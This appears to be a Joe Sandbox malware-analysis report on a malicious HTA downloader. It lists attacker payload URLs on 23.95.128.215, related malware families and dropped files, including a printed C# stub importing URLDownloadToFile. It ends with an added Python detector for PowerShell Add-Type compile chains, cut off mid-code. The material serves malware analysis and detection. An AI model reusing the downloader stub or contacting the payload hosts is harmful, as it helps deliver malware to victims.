http://ip.3105.filemail.com | powershell.exe, 00000009.00000002.1820142065.00000000056EE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000009.00000002.1820142065.00000000053E8000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000003.00000002.1699204987.0000000004EF6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000009.00000002.1820142065.00000000053E8000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://3105.file | powershell.exe, 00000009.00000002.1816997416.00000000033F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1820142065.00000000053E8000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://go.micro | powershell.exe, 00000001.00000002.1811106062.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1820142065.0000000005AD4000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000009.00000002.1836439427.00000000062F8000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000009.00000002.1836439427.00000000062F8000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://23.95.128.215/226/seethepossiblethingsforentiretimetogivemebest.tIFlb; | powershell.exe, 00000001.00000002.1819843824.000000000726C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://go.microsoft.cH | powershell.exe, 00000007.00000002.1856532641.0000000007270000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://go.micros | powershell.exe, 00000003.00000002.1699204987.0000000004EF6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000009.00000002.1820142065.00000000053E8000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://23.95.128.215/226/seethep | powershell.exe, 00000001.00000002.1811106062.00000000049F8000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.m | powershell.exe, 00000009.00000002.1841164664.0000000007BAF000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://crl.micro | powershell.exe, 00000001.00000002.1828783287.00000000080F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820146724.00000000072E1000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore6lB | powershell.exe, 00000001.00000002.1811106062.00000000048A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1699204987.0000000004DA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1848545841.0000000004C29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1848545841.0000000004C38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1820142065.0000000005291000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://23.95.128.215/226/seethepossiblethingsforentiretimetogivemebest.tIFPb | powershell.exe, 00000001.00000002.1819843824.000000000726C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000003.00000002.1699204987.0000000004EF6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000009.00000002.1836439427.00000000062F8000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.1817137670.0000000005907000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1701451021.0000000005E08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1836439427.00000000062F8000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.1811106062.00000000048A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1699204987.0000000004DA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1848545841.0000000004C38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1820142065.0000000005291000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://3105.filemail.com | powershell.exe, 00000009.00000002.1820142065.00000000053E8000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
193.30.119.205 | ip.3105.filemail.com | unknown | 680 | DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | false
23.95.128.215 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1564308
Start date and time: 2024-11-28 07:17:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 40s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: greatthingetniretimewithgoodnewgivenwhichgiventhnseethebest.hta
Detection: MAL
Classification: mal100.phis.expl.evad.winHTA@17/19@1/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 34
• Number of non-executed functions: 11
Cookbook Comments:
• Found application associated with file extension: .hta
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target mshta.exe, PID 6848 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 2336 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 2492 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 6248 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7064 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:17:58 | API Interceptor | 90x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
193.30.119.205 | Pedido No 4500924462.xls | malicious | Unknown |
193.30.119.205 | 26-11-24_. AVIMAR SHIP CHANDLERS.xls | malicious | HTMLPhisher |
193.30.119.205 | List#U0103 de produse.xls | malicious | HTMLPhisher |
193.30.119.205 | Inquiry.js | malicious | Unknown |
193.30.119.205 | Shipping Document.xla.xlsx | malicious | HTMLPhisher |
193.30.119.205 | creamymilkburnwtithsweetheartshegivenmebestterthingswhichnewandshineforme.hta | malicious | Cobalt Strike, FormBook, HTMLPhisher |
193.30.119.205 | sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta | malicious | Cobalt Strike, Remcos, HTMLPhisher |
193.30.119.205 | thinkingbestthingswhichcomingetniretimegivenmegood.hta | malicious | Cobalt Strike, Remcos, HTMLPhisher |
193.30.119.205 | Doc261124.vbs | malicious | Snake Keylogger, VIP Keylogger |
193.30.119.205 | New RFQ20241142.xls | malicious | FormBook, HTMLPhisher |
23.95.128.215 | Pedido No 4500924462.xls | malicious | Unknown | 23.95.128.215/43/seemegivenmebesttokissyourlipswithentirethingsf9rmegive.tIF
23.95.128.215 | 26-11-24_. AVIMAR SHIP CHANDLERS.xls | malicious | HTMLPhisher | 23.95.128.215/226/wc/greatthingetniretimewithgoodnewgivenwhichgiventhnseethebest.hta
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ip.3105.filemail.com | Pedido No 4500924462.xls | malicious | Unknown | 193.30.119.205
ip.3105.filemail.com | 26-11-24_. AVIMAR SHIP CHANDLERS.xls | malicious | HTMLPhisher | 193.30.119.205
ip.3105.filemail.com | List#U0103 de produse.xls | malicious | HTMLPhisher | 193.30.119.205
ip.3105.filemail.com | Inquiry.js | malicious | Unknown | 193.30.119.205
ip.3105.filemail.com | Shipping Document.xla.xlsx | malicious | HTMLPhisher | 193.30.119.205
ip.3105.filemail.com | creamymilkburnwtithsweetheartshegivenmebestterthingswhichnewandshineforme.hta | malicious | Cobalt Strike, FormBook, HTMLPhisher | 193.30.119.205
ip.3105.filemail.com | sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta | malicious | Cobalt Strike, Remcos, HTMLPhisher | 193.30.119.205
ip.3105.filemail.com | thinkingbestthingswhichcomingetniretimegivenmegood.hta | malicious | Cobalt Strike, Remcos, HTMLPhisher | 193.30.119.205
ip.3105.filemail.com | Doc261124.vbs | malicious | Snake Keylogger, VIP Keylogger | 193.30.119.205
ip.3105.filemail.com | New RFQ20241142.xls | malicious | FormBook, HTMLPhisher | 193.30.119.205
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AS-COLOCROSSINGUS | niceidea.hta | malicious | Cobalt Strike, HTMLPhisher | 192.3.95.197
AS-COLOCROSSINGUS | Order Summary.xls | malicious | Unknown | 104.168.46.26
AS-COLOCROSSINGUS | Order Summary.xls | malicious | Unknown | 104.168.46.26
AS-COLOCROSSINGUS | Order Summary.xls | malicious | Unknown | 104.168.46.26
AS-COLOCROSSINGUS | container payment.xls | malicious | Unknown | 107.175.113.196
AS-COLOCROSSINGUS | Payment Advice.xls | malicious | HTMLPhisher | 192.3.95.197
AS-COLOCROSSINGUS | Pedido No 4500924462.xls | malicious | Unknown | 23.95.128.215
AS-COLOCROSSINGUS | 26-11-24_. AVIMAR SHIP CHANDLERS.xls | malicious | HTMLPhisher | 23.95.128.215
AS-COLOCROSSINGUS | container payment.xls | malicious | Unknown | 107.175.113.196
AS-COLOCROSSINGUS | container payment.xls | malicious | Unknown | 107.175.113.196
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | m68k.elf | malicious | Unknown | 141.89.70.14
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | powerpc.elf | malicious | Unknown | 134.28.103.153
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | arm5.elf | malicious | Unknown | 139.20.77.10
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | jmggnxeedy.elf | malicious | Unknown | 137.250.32.211
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | https://michiganchronicle.com/philanthropy-under-siege-how-the-fight-against-the-fearless-fund-threatens-black-womens-progress-in-detroit/ | malicious | Unknown | 141.95.124.137
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | Pedido No 4500924462.xls | malicious | Unknown | 193.30.119.205
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | 26-11-24_. AVIMAR SHIP CHANDLERS.xls | malicious | HTMLPhisher | 193.30.119.205
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | List#U0103 de produse.xls | malicious | HTMLPhisher | 193.30.119.205
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | Inquiry.js | malicious | Unknown | 193.30.119.205
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | pbnpvwfhco.elf | malicious | Unknown | 141.36.226.152
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | Order SMG 201906 20190816order.pdf.scr.exe | malicious | AgentTesla, MassLogger RAT, PureLog Stealer | 193.30.119.205
3b5074b1b5d032e5620f69f9f700ff0e | NF---710.msi | malicious | AteraAgent | 193.30.119.205
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | Amadey, Stealc, Vidar | 193.30.119.205
3b5074b1b5d032e5620f69f9f700ff0e | Teklif Talebi__77252662______PDF_PDF.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 193.30.119.205
3b5074b1b5d032e5620f69f9f700ff0e | ORDEN DE COMPRA.pdf.lnk | malicious | Unknown | 193.30.119.205
3b5074b1b5d032e5620f69f9f700ff0e | hesaphareketi-01-27112024.exe | malicious | Snake Keylogger | 193.30.119.205
3b5074b1b5d032e5620f69f9f700ff0e | Teklif_PDF.exe | malicious | MassLogger RAT, PureLog Stealer, Snake Keylogger, VIP Keylogger | 193.30.119.205
3b5074b1b5d032e5620f69f9f700ff0e | New_June_products_list_Needed_pdf.scr.exe | malicious | Unknown | 193.30.119.205
3b5074b1b5d032e5620f69f9f700ff0e | Arab Bank_ Payment Advice doc.pdf.scr.exe | malicious | Unknown | 193.30.119.205
3b5074b1b5d032e5620f69f9f700ff0e | ORDEN DE COMPRA.pdf.lnk | malicious | Lokibot | 193.30.119.205
                                                                          No context
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: Unicode text, UTF-16, little-endian text, with very long lines (431), with CRLF line terminators
Category: dropped
Size (bytes): 165320
Entropy (8bit): 3.9154650100951054
Encrypted: false
SSDEEP: 3072:cQKStd/roV5KEwdQKStd/roV5KEwzQKStd/roV5KEwt:hK2d/rY5KBuK2d/rY5KBsK2d/rY5KBt
MD5: 5BE16D230E88F7D40E09E2E938446071
SHA1: 668C33BA360AE4E37B8C440DA266F5CFAFCD4750
SHA-256: B7390070E99BA85CF154363319100F6D6E201CB6570C90C6FC132F16CB218AE0
SHA-512: 8EC25D49B3065689B779D1AE5993CA2DF3608DF81648479F138C47CB7B51D92D9DA73B4E39C910EB0EE0D88297BA93B0E2B77B58B1B927F5D9A79AE1AB66E651
Malicious: false
                                                                          Preview:..........U.I.K.p.Z.P.R.v.l.e.L.i.m.n.z. .=. .".q.U.i.m.W.f.A.L.a.c.I.C.H.l.g.".....p.b.t.L.W.U.h.L.W.B.U.s.r.p.W. .=. .".k.U.G.i.K.p.x.L.q.P.x.j.C.p.b.".....W.k.h.i.p.Z.l.W.n.h.z.n.p.W.q. .=. .".h.W.a.L.A.c.v.j.U.q.N.k.W.B.J.".....G.G.h.Z.U.K.z.n.A.z.d.b.m.h.l. .=. .".q.o.G.Z.U.W.U.B.i.T.q.K.P.i.i.".....i.v.m.o.d.K.L.B.U.h.W.k.L.i.G. .=. .".k.i.d.p.U.L.u.L.P.U.k.O.W.B.N.".....e.R.B.U.f.W.U.n.g.c.L.i.A.Z.t. .=. .".b.i.G.J.d.Q.K.O.S.J.f.d.f.b.j.".........Z.l.l.B.W.A.W.W.P.R.i.g.c.W.W. .=. .".e.W.c.h.z.G.K.R.p.a.H.i.U.K.L.".....k.m.O.W.j.h.W.z.l.B.L.N.b.T.C. .=. .".W.C.H.S.C.i.K.W.t.U.S.L.W.B.c.".....J.N.Z.l.e.G.A.i.H.W.G.o.z.m.i. .=. .".d.c.O.f.O.L.t.t.t.l.u.r.K.e.L.".........c.W.d.c.P.r.Q.f.I.n.Q.z.f.r.K. .=. .".B.T.G.o.U.q.f.C.o.z.g.t.e.x.k.".....k.i.u.m.u.o.b.h.h.Z.i.c.x.G.b. .=. .".U.W.I.W.p.i.J.u.s.O.m.f.S.c.a.".....b.G.g.m.e.L.k.W.l.A.C.L.R.U.A. .=. .".a.a.Z.t.c.Q.N.W.i.W.b.o.z.m.L.".....C.n.o.W.U.W.h.i.e.L.i.P.u.T.t. .=. .".u.c.a.r.t.a.p.e.l.e.U.A.p.f.W.i.A.C.W.L.k.G.".....s.U.o.
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 0.742582331134527
Encrypted: false
SSDEEP: 3:Nlllulv/:NllUv
MD5: 80DF4908B623122110876B0E4F96E511
SHA1: 6BD95B95B5A946231A0502DAF607C7BCC7A91E14
SHA-256: 02A792070E93EF52A2589FE036C9F20DC47DC669C5283DB7BEDE252423637C18
SHA-512: A6E1ABAB64AAD9E7981C440DEC7DCF9136F4A9C9C76AFBF53C8790D4DC4F9F71245B778F71970DEAE04D5261AD63886A8E9001A60C3492FB007513E90EB8D2B2
Malicious: false
                                                                          Preview:@...e...................................e.......................
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type: Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Thu Nov 28 08:01:16 2024, 1st section name ".debug$S"
Category: dropped
Size (bytes): 1328
Entropy (8bit): 3.9741995410170654
Encrypted: false
SSDEEP: 24:H0e9ERhfGzhXDfHYWwKEbsmfII+ycuZhNFakSzPNnqSqd:IczYKPmg1ulFa35qSK
MD5: B0C9C1A1E6D71F6421D073AD20C2D352
SHA1: 5357002B571F172947CE09E2B30831519D45132D
SHA-256: 380DC5AE0DE169528B34677AC3F2A3C2DFD6161BDB7CD4C4CE95CB53C55BC779
SHA-512: E4CE3F960F9C7A47BA3ED59451ED036347BFB6EDE3310143F948532F51FB6606C29B7A7E7E32FD61F2DECE06524595A511944EFC1EB807782A32A23AD778B5EC
Malicious: false
                                                                          Preview:L...L#Hg.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........R....c:\Users\user\AppData\Local\Temp\w0uathue\CSC6F7F1D769E649D6AA11CFF4BFABFB3.TMP..................!..J.......~...........4.......C:\Users\user\AppData\Local\Temp\RES2022.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...w.0.u.a.t.h.u.e...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Note:the record above is repeated 10 times in this report with identical metadata and hashes; PowerShell writes this 60-byte probe script on every host startup to test for AppLocker lockdown (constrained language) mode, so one copy per PowerShell instance is expected and the file itself is benign
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                          File Type:MSVC .res
                                                                          Category:dropped
                                                                          Size (bytes):652
                                                                          Entropy (8bit):3.0862464220576102
                                                                          Encrypted:false
                                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryw1Gak7Ynqqx1XPN5Dlq5J:+RI+ycuZhNFakSzPNnqX
                                                                          MD5:E521BEEA8F4A7FD3C298B9029FB77EF1
                                                                          SHA1:BBE3CFA1020E08FBC89E3D5584649582F307C46A
                                                                          SHA-256:1907E380871258BF26C963677CDA787E0845D15C742735519BB31AF70DA86DA4
                                                                          SHA-512:DD41E89AABAD79D0A845D2C272824945F71E8858389D87F1C8546AD36544F824E46AFA403513FDFA1BFC78E07F91BF417908D6B287D721BFCE484FE22B168F60
                                                                          Malicious:false
                                                                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...w.0.u.a.t.h.u.e...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...w.0.u.a.t.h.u.e...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (363)
                                                                          Category:dropped
                                                                          Size (bytes):478
                                                                          Entropy (8bit):3.717417030035401
                                                                          Encrypted:false
                                                                          SSDEEP:6:V/DsYLDS81zuY4/0udMmFBDQXReKJ8SRHy4HWRbU4u/gc4oFYy:V/DTLDfuY4BbuXfH5746FYy
                                                                          MD5:0FBA8F5ECED8DF1E891AA99C6185006F
                                                                          SHA1:21FB2EA775E538A687DA4ABE2D80903C99C0E2A4
                                                                          SHA-256:CA9F0F623B9A0A49AE34855E179B548242D9EE531C2D79EF7EB7E99FDF68BEF7
                                                                          SHA-512:A832A3FE155ACE34E53AF8104F1B9731A072B77801B407020BDC68EEC14CEE2976575A4CB3DA7943DEA052DE082B1A1A23C909EC9CE38A43303A8A2F505F3F33
                                                                          Malicious:false
                                                                          Preview:.using System;.using System.Runtime.InteropServices;..namespace yqaLWfmp.{. public class cTn. {. [DllImport("UrLMon.dLL", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr jl,string yNzxn,string tYuY,uint QjUWlwdaCZW,IntPtr wA);.. }..}.
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):369
                                                                          Entropy (8bit):5.203225906435676
                                                                          Encrypted:false
                                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fkDKDVUzxs7+AEszIwkn23fkDKDhLx:p37Lvkmb6KRfGKDqWZEifGKDhLx
                                                                          MD5:4C03A98DA406D1223A21B8EDC20E7892
                                                                          SHA1:5B960BF41954C96B3B35823E04D5E9E8481B0E92
                                                                          SHA-256:D2B5859C7A73053D933D687F60FA0CBC6EC5225030C084D655329B56A09464DB
                                                                          SHA-512:74F706C1EE785B578E003FD1D5526D1A0F24DAC9B4868A27A812EBCFEC3E41776252EC62F22D14A6879CE984A483318FAB97B6760E589F0BD57B32B04DAE34A9
                                                                          Malicious:true
                                                                          Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.0.cs"
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):3072
                                                                          Entropy (8bit):2.8081586919340844
                                                                          Encrypted:false
                                                                          SSDEEP:24:etGSGPBu5exl8ceOkpeS028tjiFtkZfR0mWqVSjcUWI+ycuZhNFakSzPNnq:6lsx+ZoFjiwJWmWqVSA31ulFa35q
                                                                          MD5:9F85399D3971EA4308BFEA4EAD758A82
                                                                          SHA1:7BF628F08CC12A020EB74E8562E41F22526D13C2
                                                                          SHA-256:4D9CDCF3105E75A933978067D6D9F355AD212EDEBBACCC8111FE68504D7BA8C9
                                                                          SHA-512:8E93EA51A8146D90085399FEC56E2B4340D52063D7F262EB403F90B6D37DF5A2B6F5849BC3A4F1CC1A6407F20587AA01C8EDCAEF438A9D93D8F966049F3BB65E
                                                                          Malicious:false
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L#Hg...........!.................#... ...@....... ....................................@.................................T#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................4.-.....p.....p.......................................... ;.....P ......M.........S.....V.....\.....a.....m...M.....M...!.M.....M.......!.....*.......;.......................................$..........<Module>.w0
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (446), with CRLF, CR line terminators
                                                                          Category:modified
                                                                          Size (bytes):867
                                                                          Entropy (8bit):5.292583775439026
                                                                          Encrypted:false
                                                                          SSDEEP:24:KJBqd3ka6KRfGQLEifGQhLUKax5DqBVKVrdFAMBJTH:Cika6CHEuRUK2DcVKdBJj
                                                                          MD5:AC64CC288F4707F3ED6944EB7CEA65CF
                                                                          SHA1:FB2400883F392CAAC7849B9F99D1E9E9203C8E39
                                                                          SHA-256:D9CD3A531505C3F1B59545FA989494C3994989D300E3BA2CF09C85C6F6A4BF4D
                                                                          SHA-512:4F5AC35546C60C6640A6BA84E2BE2F13F4CA987C7DF5547F9C6B0815E01C3E6ADE04AA7E9FF7894D3386BEA8475A0F186B7470DFCE4DC014CCB292A84004A8E2
                                                                          Malicious:false
                                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
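The csc.exe command line recorded above, together with the w0uathue.0.cs source and the cvtres.exe child, is the footprint PowerShell's Add-Type leaves when a script compiles a P/Invoke stub on the fly. The following detection logic is an added example and is not part of the Joe Sandbox report or of the sample: it flags csc.exe launched by powershell.exe whose command line compiles %TEMP%\<dir>\<dir>.0.cs into <dir>.dll, records whether the compiler spawned cvtres.exe, and scans the dropped C# source for DllImport declarations that name a download primitive (the mixed-case "UrLMon.dLL" string in the dropped source is why the match is case-insensitive). The process events and the event schema (pid, ppid, image, cmdline) are constructed for the example; the csc.exe command line and the C# stub are the ones shown in the records above.

```python
"""Detect PowerShell Add-Type compile chains and download primitives in the compiled stub.

Added example: not code from the analysed sample or from Joe Sandbox. The event
schema and all sample events below are constructed for illustration.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path or basename of the executable
    cmdline: str


# Command-line shape Add-Type hands to csc.exe: /out:"<TEMP>\<dir>\<dir>.dll" ... "<TEMP>\<dir>\<dir>.0.cs"
ADD_TYPE_RE = re.compile(
    r'/out:"(?P<out>[^"]*?\\Temp\\(?P<dir>[^\\"]+)\\(?P=dir)\.dll)".*?'
    r'"(?P<src>[^"]*?\\Temp\\(?P=dir)\\(?P=dir)\.0\.cs)"',
    re.IGNORECASE | re.DOTALL,
)

# [DllImport("lib.dll", ...)] public static extern <ret> <func>(
DLLIMPORT_RE = re.compile(
    r'\[DllImport\("(?P<dll>[^"]+)"[^\]]*\]\s*public\s+static\s+extern\s+\w+\s+(?P<func>\w+)\s*\(',
    re.IGNORECASE,
)

# Native functions that fetch a remote resource to disk; names compared lower-cased.
DOWNLOAD_PRIMITIVES = {
    ("urlmon.dll", "urldownloadtofile"),
    ("urlmon.dll", "urldownloadtofilea"),
    ("urlmon.dll", "urldownloadtofilew"),
    ("urlmon.dll", "urldownloadtocachefile"),
}


def _base(image: str) -> str:
    """Lower-cased basename of a Windows image path."""
    return image.rsplit("\\", 1)[-1].lower()


def find_add_type_chains(events):
    """One finding per csc.exe started by powershell.exe with an Add-Type style command line."""
    by_pid = {e.pid: e for e in events}
    children = {}
    for e in events:
        children.setdefault(e.ppid, []).append(e)
    findings = []
    for e in events:
        if _base(e.image) != "csc.exe":
            continue
        parent = by_pid.get(e.ppid)
        if parent is None or _base(parent.image) != "powershell.exe":
            continue
        m = ADD_TYPE_RE.search(e.cmdline)
        if not m:
            continue
        findings.append({
            "powershell_pid": parent.pid,
            "csc_pid": e.pid,
            "temp_dir": m.group("dir"),
            "source": m.group("src"),
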